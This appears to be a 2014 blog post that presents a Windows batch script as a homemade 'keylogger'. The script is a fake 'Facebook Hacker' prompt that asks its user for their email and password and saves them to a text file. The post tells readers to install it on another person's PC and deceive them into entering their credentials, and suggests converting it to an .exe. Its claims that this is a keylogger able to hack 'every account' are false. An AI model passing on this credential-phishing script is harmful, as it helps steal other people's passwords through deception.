Ofer For You (1)

Sunday 13 July 2014

How To Make Your Own Keylogger

Here is the one of favourite trick byu the admin Kunal Vohra 

"How to Make a keylogger of your own"

So how to Create your own simple keylogger to hack every account like Facebook, Gmail, Yahoo etc..

You can create it using Notepad, and the only work u have to do just install that keylogger on him/her
PC and tell them that this is a Facebook Hacker when they type there Email And Password in it and you will get the Password from their PC.
Now start:-
(Facebook Hacker)

1. Create a folder named "Hacker" in C: drive in your computer (do not use quotes)

2. Copy the following codes and paste it in notepad and save it as BATCH file (extension)is .bat .
 ex: anyname.bat

@echo off
color a
title Facebook Hacking :Login:
echo Please Enter Your Facebook Email Adress And Password
echo To Hack Any Facebook Account
cd "C:\Hacker"
set /p user=Email ID:
set /p pass=Password:
echo Username="%user%" Password="%pass%">hACKED.txt
echo Press any key to continue
pause >n
echo Loading.....
echo Enter E-Mail Id Of Victim
set /p user=Email ID:
echo Username="%user%">Victim.txt
echo Press any key to hack this ID
pause >
echo Processing...
pause >n

3.SAVE it in notepad as .bat file. (at anywhere SAY - Desktop).
4.Now open the that file
5.it will ask for your Facebook Email ID and Password.
Enter Email ID and Password in it.
6. Now it will ask for Victim EMAIL ID
Enter any ID( SAY - 111111@ ds.com).
7. After completing this go to that Folder that you created earlier named Hacker
open this folder.
Automatically you will get the Email IDs and Password in TEXT file.

NOTE : To convert these bat files to exe, use this .bat to .exe converter tool

That's all :)

Still Having Problem..!!! Connect with Admin Kunal Vohra

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